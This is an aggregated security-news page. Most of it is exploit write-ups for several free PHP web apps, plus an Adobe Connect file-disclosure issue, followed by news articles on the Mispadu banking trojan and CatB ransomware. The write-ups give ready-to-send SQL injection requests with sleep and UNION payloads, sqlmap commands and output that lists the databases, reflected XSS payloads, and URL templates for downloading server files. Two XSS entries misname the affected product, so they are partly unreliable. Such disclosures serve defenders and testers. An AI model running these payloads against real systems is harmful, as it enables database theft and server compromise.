101+ News Portal version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: 101+ News Portal - SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/101news_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the page (/101news/search.php) in 101+ News Portal allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "searchtitle" parameter. ## Request PoC```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'```This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "searchtitle" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```POST /101news/search.php HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/101news/Content-Type: application/x-www-form-urlencodedContent-Length: 59Cookie: PHPSESSID=o5fslt60dlojncb7jnft04lps9searchtitle=232943'%2b(select*from(select(sleep(20)))a)%2b'```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/multi]└─# sqlmap -r sqli.txt -p 'searchtitle' --batch --dbs --level=3 --risk=2                                           ---snip---POST parameter 'searchtitle' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 114 HTTP(s) requests:---Parameter: searchtitle (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: searchtitle=232943' AND 3793=(SELECT (CASE WHEN (3793=3793) THEN 3793 ELSE (SELECT 6168 UNION SELECT 2808) END))-- KdPX    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: searchtitle=232943' AND (SELECT 1460 FROM (SELECT(SLEEP(5)))dqHc)-- zMGY    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: searchtitle=232943' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787071,0x457444695056617478516b4b4f666e73744162466478444e5061624161514f78726c727777764c6b,0x716a6b6271)-- ----[18:01:02] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)[18:01:02] [INFO] fetching database namesavailable databases [5]:[*] information_schema[*] mysql[*] newsportal[*] performance_schema[*] phpmyadmin---snip---```

101+ News Portal 1.0 SQL Injection

Music Gallery Site version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Music Gallery Site - Cross Site Scripting Vulnerability (Authenticated)# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-music.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Online Pizza Ordering System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-music/admin/?page=musics63401'%3balert(1)%2f%2f399 HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-music/admin/Cookie: PHPSESSID=05o776i4lcn4nm1h48he29gd9b```

Music Gallery Site 1.0 Cross Site Scripting

Medicine Tracker System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Medicine Tracker System - Cross Site Scripting Vulnerability# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16308/medicine-tracker-system-php-oop-and-mysql-db-source-code-free-download.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Medicine Tracker System allows to execute JavaScript code. ## Request PoC```GET /php-mts/?page=about%3cscript%3ealert(1)%3c%2fscript%3e HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-mts/Cookie: PHPSESSID=9gruivatbrq61qio77q3p7j77a```

Medicine Tracker System 1.0 Cross Site Scripting

Yoga Class Registration System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Yoga Class Registration System - Cross Site Scripting Vulnerability (Authenticated)# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Online Pizza Ordering System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-ycrs/admin/?page=classes%2fmanage_class58913'%3balert(1)%2f%2f575&id=2 HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-ycrs/admin/?page=classesCookie: PHPSESSID=intlfrkii1gsh9pjgeoo0dhu3b```

Yoga Class Registration System 1.0 Cross Site Scripting

Online Pizza Ordering System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Pizza Ordering System 1.0 - "id" SQLi# Date: 19/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip# Version: 1.0# Tested on: Windows, Linux## Description A Blind SQL injection vulnerability in the (/php-opos/index.php) page in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands by "id" parameter. ## Request PoC```GET /php-opos/index.php?page=category&id=1' HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-opos/Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20```This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "id" parameter, the response to request was 200 status code with message of OK, but 20 seconds later, which indicates that our sleep 20 command works. ```GET /php-opos/index.php?page=category&id=1'%2b(select*from(select(sleep(10)))a)%2b' HTTP/1.1Host: 192.168.1.101Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.101/php-opos/Cookie: PHPSESSID=o1tk08lff329ovpl5mt24tkg20```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/php-opos]└─# sqlmap -r sql.txt -p 'id' --batch --dbs --level=3 --risk=2---snip---[13:20:45] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 52 HTTP(s) requests:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=category&id=1' AND 9957=9957-- dMoW    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: page=category&id=1' AND (SELECT 9683 FROM(SELECT COUNT(*),CONCAT(0x717a6b7071,(SELECT (ELT(9683=9683,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JUhz    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=category&id=1' AND (SELECT 1462 FROM (SELECT(SLEEP(5)))HRjs)-- mEaq    Type: UNION query    Title: Generic UNION query (NULL) - 2 columns    Payload: page=category&id=-1987' UNION ALL SELECT NULL,CONCAT(0x717a6b7071,0x79716851566b7072685458534e4c6f7a75784f50614266454c7746646347794d565a43634b684958,0x716a6b7071)-- ----[13:20:45] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.54, PHP 8.2.0back-end DBMS: MySQL >= 5.0 (MariaDB fork)[13:20:45] [INFO] fetching database names[13:20:45] [INFO] retrieved: 'information_schema'[13:20:46] [INFO] retrieved: 'mysql'[13:20:46] [INFO] retrieved: 'opos_db'[13:20:46] [INFO] retrieved: 'performance_schema'[13:20:46] [INFO] retrieved: 'phpmyadmin'----snip----```

Online Pizza Ordering System 1.0 SQL Injection

Human Resources Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Human Resources Management System - HRM - Multiple SQLi# Date: 16/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip# Version: 1.0# Tested on: Windows## Description A Blind SQL injection vulnerability in the login page (/hrm/controller/login.php) in Human Resources Management System allows remote unauthenticated attackers to execute remote command through arbitrary SQL commands by "name" parameter. ## Request PoC```POST /hrm/controller/login.php HTTP/1.1Host: 192.168.1.103Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.103/hrm/Content-Type: application/x-www-form-urlencodedContent-Length: 73name=test@testdomain.com'&password=test&submit=Sign+In```This request causes an error. Adding "'%2b(select*from(select(sleep(20)))a)%2b'" to the end of "name" parameter, the response to request was 302 status code with message of Found, but 20 seconds later, which indicates that our sleep 20 command works. ```POST /hrm/controller/login.php HTTP/1.1Host: 192.168.1.103Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.103/hrm/Content-Type: application/x-www-form-urlencodedContent-Length: 114name=test@testdomain.com'%2b(select*from(select(sleep(20)))a)%2b'&password=test&submit=Sign+In```## Exploit with sqlmapSave the request from burp to file ```┌──(root㉿caesar)-[/home/kali/Workstation/hrm]└─# sqlmap -r sqli.txt -p 'name' --batch --dbs --level=3 --risk=2---snip----[15:49:36] [INFO] testing 'MySQL UNION query (89) - 81 to 100 columns'POST parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Nsqlmap identified the following injection point(s) with a total of 838 HTTP(s) requests:---Parameter: name (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: name=test@testdomain.com' AND 3287=(SELECT (CASE WHEN (3287=3287) THEN 3287 ELSE (SELECT 8737 UNION SELECT 2671) END))-- -&password=a5P!s3v!K8&submit=Sign In    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: name=test@testdomain.com' OR (SELECT 6958 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6958=6958,1))),0x716b786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VHwA&password=a5P!s3v!K8&submit=Sign In    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: name=test@testdomain.com' AND (SELECT 1760 FROM (SELECT(SLEEP(5)))LTmV)-- fhJt&password=a5P!s3v!K8&submit=Sign In---[15:49:36] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.2.0, Apache 2.4.54, PHP----snip----```## The "password" parameter in the POST request is also vulnerable. It can be exploited in the same way.

Human Resources Management System 1.0 SQL Injection

Adobe Connect versions 11.4.5 and below as well as versions 12.1.5 and below suffer from a file disclosure vulnerability.

    # Title: adobe connect - Local File Disclosure / Download [security featurebypass vulnerability]# Author: h4shur# date:2021.01.16-2023.02.17# CVE: CVE-2023-22232# Vendor Homepage: https://www.adobe.com# Software Link: https://www.adobe.com/products/adobeconnect.html# Version: 11.4.5 and earlier, 12.1.5 and earlier# User interaction: None# Tested on: Windows 10 & Google Chrome, kali linux & firefox### Summary:Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) areaffected by an Improper Access Control vulnerability that could result in aSecurity feature bypass. An attacker could leverage this vulnerability toimpact the integrity of a minor feature.Exploitation of this issue does not require user interaction.### Description :There are many web applications in the world, each of which hasvulnerabilities due to developer errors, and this is a problem for all ofthem, and even the best of them, like the "adobe connect" program, havevulnerabilities that occur every month. They are found and fixed by theteam.* What is LFD bug?LFD bug stands for Local File Disclosure / Download, which generally allowsthe attacker to read and download files within the server, so it can beconsidered a very dangerous bug in the web world and programmers must beaware of it. Be careful and maintain security against this bug* Intruder access level with LFD bugThe level of access using this bug can be even increased to the level ofaccess to the website database in such a way that the hacker readssensitive files inside the server that contain database entry informationand enters the database and by extracting the information The admin willhave a high level of access* Identify vulnerable sitesTo search for LFD bugs, you should check the site inputs. If there is noproblem with receiving ./ characters, you can do the test to read the filesinside the server if they are vulnerable. Enter it and see if it is read ornot, or you can use files inside the server such as / etc / passwd / .. andstep by step using ../ to return to the previous path to find the passwdfile* And this time the "lfd" in "adobe connect" bug:To download and exploit files, you must type the file path in the"download-url" variable and the file name and extension in the "name"variable.You can download the file by writing the file path and file name andextension.When you have written the file path, file name and extension in the siteaddress variables, a download page from Adobe Connect will open for you,with "Save to My Computerfile name]" written in the download box and a file download link at thebottom of the download box, so you can download the file.* There are values inside the url that do not allow a file other than thisfile to be downloaded.* Values: sco_id and ticketsBut if these values are cleared, you will see that reloading is possiblewithout any obstaclesAt another address, you can download multiple files as a zip file.We put the address of the files in front of the variable "ffn" and if wewant to add the file, we add the variable "ffn" again and put the addressof the file in front of it. The "download_type" variable is also used tospecify the zip extension.### POC :https://target.com/[folder]/download?download-url=[URL]&name=[file.type]https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[basefile folder]### References:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232https://nvd.nist.gov/vuln/detail/CVE-2023-22232https://helpx.adobe.com/security/products/connect/apsb23-05.html

Adobe Connect 11.4.5 / 12.1.5 Local File Disclosure

A banking trojan dubbed Mispadu has been linked to multiple spam campaigns targeting countries like Bolivia, Chile, Mexico, Peru, and Portugal with the goal of stealing credentials and delivering other payloads.
The activity, which commenced in August 2022, is currently ongoing, Ocelot Team from Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News.
Mispadu (

A banking trojan dubbed **Mispadu** has been linked to multiple spam campaigns targeting countries like Bolivia, Chile, Mexico, Peru, and Portugal with the goal of stealing credentials and delivering other payloads.

The activity, which commenced in August 2022, is currently ongoing, Ocelot Team from Latin American cybersecurity firm Metabase Q said in a report shared with The Hacker News.

Mispadu (aka URSA) was first documented by ESET in November 2019, describing its ability to perpetrate monetary and credential theft and act as a backdoor by taking screenshots and capturing keystrokes.

"One of their main strategies is to compromise legitimate websites, searching for vulnerable versions of WordPress, to turn them into their command-and-control server to spread malware from there, filtering out countries they do not wish to infect, dropping different type of malware based on the country being infected," researchers Fernando García and Dan Regalado said.

It's also said to share similarities with other banking trojans targeting the region, like Grandoreiro, Javali, and Lampion. Attack chains involving the Delphi malware leverage email messages urging recipients to open fake overdue invoices, thereby triggering a multi-stage infection process.

Should a victim open the HTML attachment sent via the spam email, it verifies that the file was opened from a desktop device and then redirects to a remote server to fetch the first-stage malware.

The RAR or ZIP archive, when launched, is designed to make use of rogue digital certificates – one which is the Mispadu malware and the other, an AutoIT installer – to decode and execute the trojan by abusing the legitimate certutil command-line utility.

Mispadu is equipped to gather the list of antivirus solutions installed on the compromised host, siphon credentials from Google Chrome and Microsoft Outlook, and facilitate the retrieval of additional malware.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

This includes an obfuscated Visual Basic Script dropper that serves to download another payload from a hard-coded domain, a .NET-based remote access tool that can run commands issued by an actor-controlled server, and a loader written in Rust that, in turn, executes a PowerShell loader to run files directly from memory.

What's more, the malware utilizes malicious overlay screens to obtain credentials associated with online banking portals and other sensitive information.

Metabase Q noted that the certutil approach has allowed Mispadu to bypass detection by a wide range of security software and harvest over 90,000 bank account credentials from over 17,500 unique websites.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Mispadu Banking Trojan Targets Latin America: 90,000+ Credentials Stolen

The threat actors behind the CatB ransomware operation have been observed using a technique called DLL search order hijacking to evade detection and launch the payload.
CatB, also referred to as CatB99 and Baxtoy, emerged late last year and is said to be an "evolution or direct rebrand" of another ransomware strain known as Pandora based on code-level similarities.
It's worth noting that the use

Endpoint Security / Ransomware

The threat actors behind the CatB ransomware operation have been observed using a technique called DLL search order hijacking to evade detection and launch the payload.

CatB, also referred to as CatB99 and Baxtoy, emerged late last year and is said to be an "evolution or direct rebrand" of another ransomware strain known as Pandora based on code-level similarities.

It's worth noting that the use of Pandora has been attributed to Bronze Starlight (aka DEV-0401 or Emperor Dragonfly), a China-based threat actor that's known to employ short-lived ransomware families as a ruse to likely conceal its true objectives.

One of the key defining characteristics of CatB is its reliance on DLL hijacking via a legitimate service called Microsoft Distributed Transaction Coordinator (MSDTC) to extract and launch the ransomware payload.

"Upon execution, CatB payloads rely on DLL search order hijacking to drop and load the malicious payload," SentinelOne researcher Jim Walter said in a report published last week. "The dropper (versions.dll) drops the payload (oci.dll) into the System32 directory."

The dropper is also responsible for carrying out anti-analysis checks to determine if the malware is being executed within a virtual environment, and ultimately abusing the MSDTC service to inject the rogue oci.dll containing the ransomware into the msdtc.exe executable upon system restart.

"The \[MSDTC\] configurations changed are the name of the account under which the service should run, which is changed from Network Service to Local System, and the service start option, which is changed from Demand start to Auto start for persistency if a restart occurs," Minerva Labs researcher Natalie Zargarov explained in a previous analysis.

One striking aspect of the ransomware is its absence of a ransom note. Instead, each encrypted file is updated with a message urging the victims to make a Bitcoin payment.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

Another trait is the malware's ability to harvest sensitive data such as passwords, bookmarks, history from web browsers Google Chrome, Microsoft Edge (and Internet Explorer), and Mozilla Firefox.

"CatB joins a long line of ransomware families that embrace semi-novel techniques and atypical behaviors such as appending notes to the head of files," Walter said. "These behaviors appear to be implemented in the interest of detection evasion and some level of anti-analysis trickery."

This is not the first time the MSDTC service has been weaponized for malicious purposes. In May 2021, Trustwave disclosed a novel malware dubbed Pingback that employed the same technique to achieve persistence and bypass security solutions.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Shed Light on CatB Ransomware's Evasion Techniques

In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur.

Tag

#chrome